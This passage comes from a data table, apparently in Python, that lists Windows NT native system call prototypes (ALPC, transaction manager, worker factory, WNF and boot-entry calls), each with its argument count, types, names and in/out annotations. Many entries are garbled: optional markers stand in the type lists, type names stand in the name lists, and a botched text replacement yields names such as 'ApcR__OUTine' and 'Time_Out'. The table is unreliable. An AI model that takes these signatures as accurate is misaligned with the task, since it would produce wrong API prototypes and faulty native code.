\"ACCESS_MASK\", \"AUDIT_EVENT_TYPE\", \"ULONG\", \"POBJECT_TYPE_LIST\", \"ULONG\", \"PGENERIC_MAPPING\", \"BOOLEAN\", \"PACCESS_MASK\", \"PNTSYSAPI\", \"PBOOLEAN\"], [\"SubsystemName\", \"HandleId\", \"ClientToken\", \"ObjectTypeName\", \"ObjectName\", \"SecurityDescriptor\", \"PrincipalSelfSid\", \"DesiredAccess\", \"AuditType\", \"Flags\", \"ObjectTypeList\", \"ObjectTypeListLength\", \"GenericMapping\", \"ObjectCreation\", \"GrantedAccess\", \"NTSTATUS\", \"GenerateOnClose\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_\", None, \"__IN_\", \"__IN_\", \"__IN_\", None, None, None]), \"NtAddAtomEx\": (4, [\"PWSTR\", \"ULONG\", \"opt_\", \"ULONG\"], [\"AtomName\", \"Length\", \"PRTL_ATOM\", \"Flags\"], \"NTSTATUS\", [None, \"__IN_\", None, \"__IN_\"]), \"NtAddBootEntry\": (2, [\"PBOOT_ENTRY\", \"opt_\"], [\"BootEntry\", \"PULONG\"], \"NTSTATUS\", [\"__IN_\", None]), \"NtAddDriverEntry\": (2, [\"PEFI_DRIVER_ENTRY\", \"opt_\"], [\"DriverEntry\", \"PULONG\"], \"NTSTATUS\", [\"__IN_\", None]), \"NtAdjustTokenClaimsAndDeviceGroups\": (16, [\"HANDLE\", \"BOOLEAN\", \"BOOLEAN\", \"BOOLEAN\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"PTOKEN_GROUPS\", \"ULONG\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"ULONG\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"ULONG\", \"PTOKEN_GROUPS\", \"opt_\", \"opt_\", \"opt_\"], [\"TokenHandle\", \"UserResetToDefault\", \"DeviceResetToDefault\", \"DeviceGroupsResetToDefault\", \"NewUserState\", \"NewDeviceState\", \"NewDeviceGroupsState\", \"UserBufferLength\", \"PreviousUserState\", \"DeviceBufferLength\", \"PreviousDeviceState\", \"DeviceGroupsBufferLength\", \"PreviousDeviceGroups\", \"PULONG\", \"PULONG\", \"PULONG\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_\", None, \"__IN_\", None, \"__IN_\", None, None, None, None]), \"NtAlertThreadByThreadId\": (1, [\"DWORD\"], [\"threadID\"], \"NTSTATUS\", [None]), \"NtAllocateReserveObject\": (3, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\", \"MEMORY_RESERVE_TYPE\"], [\"MemoryReserveHandle\", \"ObjectAttributes\", \"Type\"], \"NTSTATUS\", [\"__OUT\", \"__IN_opt\", \"__IN\"]), \"NtGetNextProcess\": (5, [\"HANDLE\", \"ACCESS_MASK\", \"ULONG\", \"ULONG\", \"PHANDLE\"], [\"ProcessHandle\", \"DesiredAccess\", \"HandleAttributes\", \"Flags\", \"NewProcessHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtGetNextThread\": (6, [\"HANDLE\", \"HANDLE\", \"ACCESS_MASK\", \"ULONG\", \"ULONG\", \"PHANDLE\"], [\"ProcessHandle\", \"ThreadHandle\", \"DesiredAccess\", \"HandleAttributes\", \"Flags\", \"NewThreadHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__OUT\"]), \"NtQueueApcThreadEx\": (6, [\"HANDLE\", \"HANDLE\", \"PPS_APC_R__OUTINE\", \"PVOID\", \"PVOID\", \"PVOID\"], [\"ThreadHandle\", \"UserApcReserveHandle\", \"ApcR__OUTine\", \"ApcArgument1\", \"ApcArgument2\", \"ApcArgument3\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtUmsThreadYield\": (1, [\"PVOID\"], [\"SchedulerParam\"], \"NTSTATUS\", [\"__IN\"]), \"NtAllocateUserPhysicalPages\": (3, [\"HANDLE\", \"PULONG_PTR\", \"PULONG_PTR\"], [\"ProcessHandle\", \"NumberOfPages\", \"UserPfnArray\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__OUT\"]), \"NtAllocateVirtualMemoryEx\": (7, [\"HANDLE\", \"PVOID*\", \"PSIZE_T\", \"ULONG\", \"ULONG\", \"PMEM_EXTENDED_PARAMETER\", \"ULONG\"], [\"ProcessHandle\", \"BaseAddress\", \"RegionSize\", \"AllocationType\", \"PageProtection\", \"ExtendedParameters\", \"ExtendedParameterCount\"], \"NTSTATUS\", [\"__IN_\", None, \"__IN_OUT_\", \"__IN_\", \"__IN_\", None, \"__IN_\"]), \"NtAlpcAcceptConnectPort\": (9, [\"PHANDLE\", \"HANDLE\", \"ULONG\", \"POBJECT_ATTRIBUTES\", \"PALPC_PORT_ATTRIBUTES\", \"PVOID\", \"PPORT_MESSAGE\", \"PALPC_MESSAGE_ATTRIBUTES\", \"BOOLEAN\"], [\"PortHandle\", \"ConnectionPortHandle\", \"Flags\", \"ObjectAttributes\", \"PortAttributes\", \"PortContext\", \"ConnectionRequest\", \"ConnectionMessageAttributes\", \"AcceptConnection\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN_OUT_opt\", \"__IN\"]), \"NtAlpcCancelMessage\": (3, [\"HANDLE\", \"ULONG\", \"ALPC_CONTEXT_ATTRIBUTES\"], [\"PortHandle\", \"Flags\", \"MessageContext\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtAlpcCreatePort\": (3, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\", \"PALPC_PORT_ATTRIBUTES\"], [\"PortHandle\", \"ObjectAttributes\", \"PortAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\"]), \"NtAlpcCreatePortSection\": (6, [\"HANDLE\", \"ULONG\", \"HANDLE\", \"ULONG\", \"PHANDLE\", \"PULONG\"], [\"PortHandle\", \"Flags\", \"SectionHandle\", \"SectionSize\", \"AlpcSectionHandle\", \"ActualSectionSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__OUT\", \"__OUT\"]), \"NtAlpcCreateResourceReserve\": (4, [\"HANDLE\", \"__reserved\", \"SIZE_T\", \"PHANDLE\"], [\"PortHandle\", \"ULONG\", \"MessageSize\", \"ResourceID\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\", \"__OUT\"]), \"NtAlpcCreateSectionView\": (3, [\"HANDLE\", \"__reserved\", \"PALPC_DATA_VIEW\"], [\"PortHandle\", \"ULONG\", \"ViewAttrbutes\"], \"NTSTATUS\", [\"__IN\", None, \"__IN_OUT\"]), \"NtAlpcCreateSecurityContext\": (3, [\"HANDLE\", \"__reserved\", \"PALPC_SECURITY_ATTRIBUTES\"], [\"PortHandle\", \"ULONG\", \"SecurityAttribute\"], \"NTSTATUS\", [\"__IN\", None, \"__IN_OUT\"]), \"NtAlpcDeletePortSection\": (3, [\"HANDLE\", \"__reserved\", \"HANDLE\"], [\"PortHandle\", \"ULONG\", \"SectionHandle\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\"]), \"NtAlpcDeleteResourceReserve\": (3, [\"HANDLE\", \"__reserved\", \"HANDLE\"], [\"PortHandle\", \"ULONG\", \"ResourceID\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\"]), \"NtAlpcDeleteSectionView\": (3, [\"HANDLE\", \"__reserved\", \"PVOID\"], [\"PortHandle\", \"ULONG\", \"ViewBase\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\"]), \"NtAlpcDeleteSecurityContext\": (3, [\"HANDLE\", \"__reserved\", \"HANDLE\"], [\"PortHandle\", \"ULONG\", \"ContextHandle\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\"]), \"NtAlpcDisconnectPort\": (2, [\"HANDLE\", \"ULONG\"], [\"PortHandle\", \"Flags\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtAlpcImpersonateClientOfPort\": (3, [\"HANDLE\", \"PPORT_MESSAGE\", \"__reserved\"], [\"PortHandle\", \"PortMessage\", \"PVOID\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None]), \"NtAlpcOpenSenderProcess\": (6, [\"HANDLE\", \"HANDLE\", \"PPORT_MESSAGE\", \"__reserved\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"ProcessHandle\", \"PortHandle\", \"PortMessage\", \"ULONG\", \"Access\", \"ObjectAttribute\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", None, \"__IN\", \"__IN\"]), \"NtAlpcOpenSenderThread\": (6, [\"HANDLE\", \"HANDLE\", \"PPORT_MESSAGE\", \"__reserved\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"ThreadHandle\", \"PortHandle\", \"PortMessage\", \"ULONG\", \"Access\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", None, \"__IN\", \"__IN\"]), \"NtAlpcQueryInformation\": (5, [\"HANDLE\", \"ALPC_PORT__INFORMATION_CLASS\", \"_bcount\", \"ULONG\", \"__opt\"], [\"PortHandle\", \"PortInformationClass\", \"PVOID\", \"Length\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\", None]), \"NtAlpcQueryInformationMessage\": (6, [\"HANDLE\", \"PPORT_MESSAGE\", \"ALPC_MESSAGE__INFORMATION_CLASS\", \"_bcount\", \"ULONG\", \"__opt\"], [\"PortHandle\", \"PortMessage\", \"MessageInformationClass\", \"PVOID\", \"Length\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", None, \"__IN\", None]), \"NtAlpcRevokeSecurityContext\": (3, [\"HANDLE\", \"__reserved\", \"HANDLE\"], [\"PortHandle\", \"ULONG\", \"ContextHandle\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\"]), \"NtAlpcSendWaitReceivePort\": (8, [\"HANDLE\", \"ULONG\", \"PPORT_MESSAGE\", \"PALPC_MESSAGE_ATTRIBUTES\", \"PPORT_MESSAGE\", \"PULONG\", \"PALPC_MESSAGE_ATTRIBUTES\", \"PLARGE_INTEGER\"], [\"PortHandle\", \"Flags\", \"SendMessage\", \"SendMessageAttributes\", \"ReceiveMessage\", \"BufferLength\", \"ReceiveMessageAttributes\", \"Time_Out\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN_OUT_opt\", \"__IN_OUT_opt\", \"__IN_OUT_opt\", \"__IN_OUT_opt\", \"__IN_opt\"]), \"NtAlpcSetInformation\": (4, [\"HANDLE\", \"ALPC_PORT__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"PortHandle\", \"PortInformationClass\", \"PortInformation\", \"Length\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_bcount\", \"__IN\"]), \"NtEnumerateBootEntries\": (2, [\"PVOID\", \"PULONG\"], [\"Buffer\", \"BufferLength\"], \"NTSTATUS\", [None, \"__IN_OUT\"]), \"NtEnumerateDriverEntries\": (2, [\"PVOID\", \"PULONG\"], [\"Buffer\", \"BufferLength\"], \"NTSTATUS\", [None, \"__IN_OUT\"]), \"NtEnumerateSystemEnvironmentValuesEx\": (3, [\"ULONG\", \"PVOID\", \"PULONG\"], [\"InformationClass\", \"Buffer\", \"BufferLength\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN_OUT\"]), \"NtQueryBootEntryOrder\": (2, [\"PULONG\", \"PULONG\"], [\"Ids\", \"Count\"], \"NTSTATUS\", [None, \"__IN_OUT\"]), \"NtQueryBootOptions\": (2, [\"PBOOT_OPTIONS\", \"PULONG\"], [\"BootOptions\", \"BootOptionsLength\"], \"NTSTATUS\", [None, \"__IN_OUT\"]), \"NtQueryDriverEntryOrder\": (2, [\"PULONG\", \"PULONG\"], [\"Ids\", \"Count\"], \"NTSTATUS\", [None, \"__IN_OUT\"]), \"NtQuerySystemEnvironmentValueEx\": (5, [\"PUNICODE_STRING\", \"LPGUID\", \"PVOID\", \"PULONG\", \"__opt\"], [\"VariableName\", \"VendorGuid\", \"Value\", \"ValueLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN_OUT\", None]), \"NTSetBootEntryOrder\": (2, [\"PULONG\", \"ULONG\"], [\"Ids\", \"Count\"], \"NTSTATUS\", [None, \"__IN\"]), \"NTSetDriverEntryOrder\": (2, [\"PULONG\", \"ULONG\"], [\"Ids\", \"Count\"], \"NTSTATUS\", [None, \"__IN\"]), \"NtQuerySystemInformationEx\": (6, [\"SYSTEM__INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\", \"__opt\"], [\"SystemInformationClass\", \"QueryInformation\", \"QueryInformationLength\", \"SystemInformation\", \"SystemInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\", None, \"__IN\", None]), \"NtInitializeNlsFiles\": (3, [\"PVOID\", \"PLCID\", \"PLARGE_INTEGER\"], [\"*BaseAddress\", \"DefaultLocaleId\", \"DefaultCasingTableSize\"], \"NTSTATUS\", [\"__OUT\", \"__OUT\", \"__OUT\"]), \"NtAcquireCMFViewOwnership\": (3, [\"PULONGLONG\", \"PBOOLEAN\", \"BOOLEAN\"], [\"TimeStamp\", \"tokenTaken\", \"replaceExisting\"], \"NTSTATUS\", [\"__OUT\", \"__OUT\", \"__IN\"]), \"NtCreateProfileEx\": (10, [\"PHANDLE\", \"HANDLE\", \"PVOID\", \"SIZE_T\", \"ULONG\", \"PULONG\", \"ULONG\", \"KPROFILE_SOURCE\", \"ULONG\", \"PGROUP_AFFINITY\"], [\"ProfileHandle\", \"Process\", \"ProfileBase\", \"ProfileSize\", \"BucketSize\", \"Buffer\", \"BufferSize\", \"ProfileSource\", \"GroupAffinityCount\", \"GroupAffinity\"], \"NTSTATUS\", [\"__OUT\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtCreateWorkerFactory\": (10, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"HANDLE\", \"HANDLE\", \"PVOID\", \"PVOID\", \"ULONG\", \"SIZE_T\", \"SIZE_T\"], [\"WorkerFactoryHandleReturn\", \"DesiredAccess\", \"ObjectAttributes\", \"CompletionPortHandle\", \"WorkerProcessHandle\", \"StartR__OUTine\", \"StartParameter\", \"MaxThreadCount\", \"StackReserve\", \"StackCommit\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtFlushInstallUILanguage\": (2, [\"LANGID\", \"ULONG\"], [\"InstallUILanguage\", \"SetComittedFlag\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtGetMUIRegistryInfo\": (3, [\"ULONG\", \"PULONG\", \"PVOID\"], [\"Flags\", \"DataSize\", \"Data\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\", \"__OUT\"]), \"NtGetNlsSectionPtr\": (5, [\"ULONG\", \"ULONG\", \"PVOID\", \"PVOID\", \"PULONG\"], [\"SectionType\", \"SectionData\", \"ContextData\", \"*SectionPointer\", \"SectionSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__OUT\", \"__OUT\"]), \"NtIsUILanguageComitted\": (0, [], [], \"NTSTATUS\", []), \"NtReleaseCMFViewOwnership\": (0, [], [], \"NTSTATUS\", []), \"NtReleaseWorkerFactoryWorker\": (1, [\"HANDLE\"], [\"WorkerFactoryHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtQueryInformationWorkerFactory\": (5, [\"HANDLE\", \"WORKERFACTORYINFOCLASS\", \"PVOID\", \"ULONG\", \"__opt\"], [\"WorkerFactoryHandle\", \"WorkerFactoryInformationClass\", \"WorkerFactoryInformation\", \"WorkerFactoryInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\", None]), \"NTSetInformationWorkerFactory\": (4, [\"HANDLE\", \"WORKERFACTORYINFOCLASS\", \"PVOID\", \"ULONG\"], [\"WorkerFactoryHandle\", \"WorkerFactoryInformationClass\", \"WorkerFactoryInformation\", \"WorkerFactoryInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\"]), \"NtWaitForWorkViaWorkerFactory\": (2, [\"HANDLE\", \"FILE_IO_COMPLETION__INFORMATION\"], [\"WorkerFactoryHandle\", \"*MiniPacket\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NTShutdownWorkerFactory\": (2, [\"HANDLE\", \"LONG\"], [\"WorkerFactoryHandle\", \"*PendingWorkerCount\"], \"NTSTATUS\", [\"__IN\", \"__IN_OUT\"]), \"NTSetTimerEx\": (4, [\"HANDLE\", \"TIMER_SET__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"TimerHandle\", \"TimerSetInformationClass\", \"TimerSetInformation\", \"TimerSetInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\"]), \"NtCancelTimer2\": (2, [\"HANDLE\", \"__opt\"], [\"TimerHandle\", \"PBOOLEAN\"], \"NTSTATUS\", [\"__IN\", None]), \"NTSetTimer2\": (4, [\"HANDLE\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"PT2_SET_PARAMETERS\"], [\"TimerHandle\", \"DueTime\", \"Period\", \"Parameters\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtQueryWnfStateData\": (6, [\"PCWNF_STATE_NAME\", \"PCWNF_TYPE_ID\", \"PVOID\", \"PWNF_CHANGE_STAMP\", \"PVOID\", \"PULONG\"], [\"StateName\", \"TypeId\", \"ExplicitScope\", \"ChangeStamp\", \"Buffer\", \"BufferSize\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_opt_\", None, None, \"__IN_OUT_\"]), \"NtUpdateWnfStateData\": (7, [\"PCWNF_STATE_NAME\", \"PVOID\", \"ULONG\", \"PCWNF_TYPE_ID\", \"PVOID\", \"WNF_CHANGE_STAMP\", \"LOGICAL\"], [\"StateName\", \"Buffer\", \"Length\", \"TypeId\", \"ExplicitScope\", \"MatchingChangeStamp\", \"CheckStamp\"], \"NTSTATUS\", [\"__IN_\", None, \"__IN_opt_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_\", \"__IN_\"]), \"NtDisableLastKnownGood\": (0, [], [], \"NTSTATUS\", []), \"NtEnableLastKnownGood\": (0, [], [], \"NTSTATUS\", []), \"NtCancelSynchronousIoFile\": (3, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PIO_STATUS_BLOCK\"], [\"ThreadHandle\", \"IoRequestToCancel\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", \"__OUT\"]), \"NTSetIoCompletion\": (5, [\"HANDLE\", \"ULONG\", \"PVOID\", \"NTSTATUS\", \"ULONG_PTR\"], [\"IoCompletionHandle\", \"CompletionKey\", \"CompletionValue\", \"IoStatus\", \"IoStatusInformation\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NTSetIoCompletionEx\": (6, [\"HANDLE\", \"HANDLE\", \"ULONG\", \"PVOID\", \"NTSTATUS\", \"ULONG_PTR\"], [\"IoCompletionHandle\", \"IoCompletionReserveHandle\", \"CompletionKey\", \"CompletionValue\", \"IoStatus\", \"IoStatusInformation\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NtRemoveIoCompletionEx\": (6, [\"HANDLE\", \"FILE_IO_COMPLETION__INFORMATION\", \"ULONG\", \"PVOID\", \"PLARGE_INTEGER\", \"BOOLEAN\"], [\"IoCompletionHandle\", \"IoCompletionInformation\", \"Count\", \"NumEntriesRemoved\", \"Time_Out\", \"Alertable\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\", \"__OUT\", \"__IN_opt\", \"__IN\"]), \"NtNotifyChangeSession\": (8, [\"HANDLE\", \"ULONG\", \"PVOID\", \"ULONG\", \"IO_SESSION_STATE\", \"IO_SESSION_STATE\", \"PVOID\", \"ULONG\"], [\"SessionHandle\", \"IoStateSequence\", \"Reserved\", \"Action\", \"IoState\", \"IoState2\", \"Buffer\", \"BufferSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtAssociateWaitCompletionPacket\": (8, [\"HANDLE\", \"HANDLE\", \"HANDLE\", \"PVOID\", \"PVOID\", \"NTSTATUS\", \"ULONG_PTR\", \"opt_\"], [\"WaitCompletionPacketHandle\", \"IoCompletionHandle\", \"TargetObjectHandle\", \"KeyContext\", \"ApcContext\", \"IoStatus\", \"IoStatusInformation\", \"PBOOLEAN\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN\", \"__IN_\", None]), \"NtFlushProcessWriteBuffers\": (0, [], [], \"NTSTATUS\", []), \"NtCommitComplete\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtCommitEnlistment\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtCommitTransaction\": (2, [\"HANDLE\", \"BOOLEAN\"], [\"TransactionHandle\", \"Wait\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtCreateEnlistment\": (8, [\"PHANDLE\", \"ACCESS_MASK\", \"HANDLE\", \"HANDLE\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"NOTIFICATION_MASK\", \"PVOID\"], [\"EnlistmentHandle\", \"DesiredAccess\", \"ResourceManagerHandle\", \"TransactionHandle\", \"ObjectAttributes\", \"CreateOptions\", \"NotificationMask\", \"EnlistmentKey\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN_opt\"]), \"NtCreateResourceManager\": (7, [\"PHANDLE\", \"ACCESS_MASK\", \"HANDLE\", \"LPGUID\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"PUNICODE_STRING\"], [\"ResourceManagerHandle\", \"DesiredAccess\", \"TmHandle\", \"RmGuid\", \"ObjectAttributes\", \"CreateOptions\", \"Description\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtCreateTransaction\": (10, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"LPGUID\", \"HANDLE\", \"ULONG\", \"ULONG\", \"ULONG\", \"PLARGE_INTEGER\", \"PUNICODE_STRING\"], [\"TransactionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"Uow\", \"TmHandle\", \"CreateOptions\", \"IsolationLevel\", \"IsolationFlags\", \"Time_Out\", \"Description\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtCreateTransactionManager\": (6, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PUNICODE_STRING\", \"ULONG\", \"ULONG\"], [\"TmHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"LogFileName\", \"CreateOptions\", \"CommitStrength\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtEnumerateTransactionObject\": (5, [\"HANDLE\", \"KTMOBJECT_TYPE\", \"PKTMOBJECT_CURSOR\", \"ULONG\", \"PULONG\"], [\"RootObjectHandle\", \"QueryType\", \"ObjectCursor\", \"ObjectCursorLength\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\", None, \"__IN\", \"__OUT\"]), \"NtFreezeTransactions\": (2, [\"PLARGE_INTEGER\", \"PLARGE_INTEGER\"], [\"FreezeTime_Out\", \"ThawTime_Out\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtGetNotificationResourceManager\": (7, [\"HANDLE\", \"PTRANSACTION_NOTIFICATION\", \"ULONG\", \"PLARGE_INTEGER\", \"__opt\", \"ULONG\", \"ULONG_PTR\"], [\"ResourceManagerHandle\", \"TransactionNotification\", \"NotificationLength\", \"Time_Out\", \"PULONG\", \"Asynchronous\", \"AsynchronousContext\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__IN\", \"__IN_opt\", None, \"__IN\", \"__IN_opt\"]), \"NtOpenEnlistment\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"HANDLE\", \"LPGUID\", \"POBJECT_ATTRIBUTES\"], [\"EnlistmentHandle\", \"DesiredAccess\", \"ResourceManagerHandle\", \"EnlistmentGuid\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtOpenResourceManager\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"HANDLE\", \"LPGUID\", \"POBJECT_ATTRIBUTES\"], [\"ResourceManagerHandle\", \"DesiredAccess\", \"TmHandle\", \"ResourceManagerGuid\", \"ObjectAttributes\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\"]), \"NtOpenTransaction\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"LPGUID\", \"HANDLE\"], [\"TransactionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"Uow\", \"TmHandle\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtOpenTransactionManager\": (6, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PUNICODE_STRING\", \"LPGUID\", \"ULONG\"], [\"TmHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"LogFileName\", \"TmIdentity\", \"OpenOptions\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtPrepareComplete\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtPrepareEnlistment\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtPrePrepareComplete\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtPrePrepareEnlistment\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtPropagationComplete\": (4, [\"HANDLE\", \"ULONG\", \"ULONG\", \"PVOID\"], [\"ResourceManagerHandle\", \"RequestCookie\", \"BufferLength\", \"Buffer\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", None]), \"NtPropagationFailed\": (3, [\"HANDLE\", \"ULONG\", \"NTSTATUS\"], [\"ResourceManagerHandle\", \"RequestCookie\", \"PropStatus\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtQueryInformationEnlistment\": (5, [\"HANDLE\", \"ENLISTMENT__INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"__opt\"], [\"EnlistmentHandle\", \"EnlistmentInformationClass\", \"EnlistmentInformation\", \"EnlistmentInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\", None]), \"NtQueryInformationResourceManager\": (5, [\"HANDLE\", \"RESOURCEMANAGER__INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"__opt\"], [\"ResourceManagerHandle\", \"ResourceManagerInformationClass\", \"ResourceManagerInformation\", \"ResourceManagerInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\", None]), \"NtQueryInformationTransaction\": (5, [\"HANDLE\", \"TRANSACTION__INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"__opt\"], [\"TransactionHandle\", \"TransactionInformationClass\", \"TransactionInformation\", \"TransactionInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\", None]), \"NtQueryInformationTransactionManager\": (5, [\"HANDLE\", \"TRANSACTIONMANAGER__INFORMATION_CLASS\", \"PVOID\", \"ULONG\", \"__opt\"], 